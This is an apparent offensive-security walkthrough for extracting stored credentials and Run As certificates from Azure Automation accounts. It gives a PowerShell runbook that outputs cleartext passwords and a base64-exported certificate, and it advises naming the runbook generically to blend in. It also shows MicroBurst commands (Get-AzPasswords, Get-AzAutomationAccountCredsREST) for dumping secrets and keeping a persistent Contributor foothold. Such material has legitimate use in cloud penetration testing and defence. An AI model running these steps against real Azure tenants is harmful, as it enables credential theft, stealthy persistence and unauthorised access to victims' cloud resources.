Automation Accounts Credentials Extraction

Automation Accounts Credentials Extraction

Steps

1) First, we will need to create a new runbook in the account. Ideally, we would name this something generic, such as AzureAutomationTutorials, to blend in.

2) This runbook will cast the Cred-1 credential item to a variable, then output the username and password to the job output:

$myCredential = Get-AutomationPSCredential -Name 'Cred-1'

$userName = $myCredential.UserName

$password = $myCredential.GetNetworkCredential().Password

$userName

$password

3) We will follow a similar process for exporting the attached Automation account Run as certificates:

$RunAsCert = Get-AutomationCertificate -Name 'AzureRunAsCertificate'

$CertificatePath = Join-Path $env:temp RunAsCertificate.pfx

$Cert = $RunAsCert.Export('pfx','CertificatePassword')

Set-Content -Value $Cert -Path $CertificatePath -Force -Encoding Byte | Write-Verbose

$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes('$CertificatePath))

$base64string

4) Finally, we can review the job output to recover the credentials. The certificates can be converted back to pfx files from the Base64 strings, and the stored credentials should be available in cleartext.

Create a "Run as" account in the test Automation account

Steps:

1) Log in as the "azureadmin" account, or as an owner of the subscription

2) Navigate to Automation Accounts section

3) Either choose an existing Automation account or create a new one. If you're creating a new Automation account, a Run as account can be created along with the account.

4) Select Run as accounts from the menu blade

5) Choose Create Azure Run As Account in the menu

6) In the next window, select the Create button

That is all that we need to do! Now we have a Run as service principal account to extract from our sample Automation account. By default, this account will have the Contributor role applied for the subscription that it is created in.

Extracting Stored Passwords and Certificates from Automation Accounts

Steps

1) Authenticate with a contributor user/role account

Connect-AzAccount 

2) Dump credentials for Automation Accounts

Get-AzPasswords -AppServices N -StorageAccounts N -Keys N -ACR N -CosmosDB N -Verbose | Out-GridView 

• When prompted to select an Azure subscription, select your test Azure subscription and click OK

• In the resulting output, you should see credentials that were dumped from the Automation account

3) Open current path in File Explorer

explorer . 

4) Log in as RunAs account

(Get-AzContext).Account (Confirm the current user context)

We now have the cleartext credentials from the Automation account and a private certificate that we can use to authenticate as the Run as account. Since the Contributor role is configured for the Run as account by default, this means we will likely have a persistent Contributor account in the subscription.

Alternate method for Automation Accounts credentials dumping:

1) MicroBurst function. Does not require Contributor account access. REST API tokens are used instead

Get-AzAutomationAccountCredsREST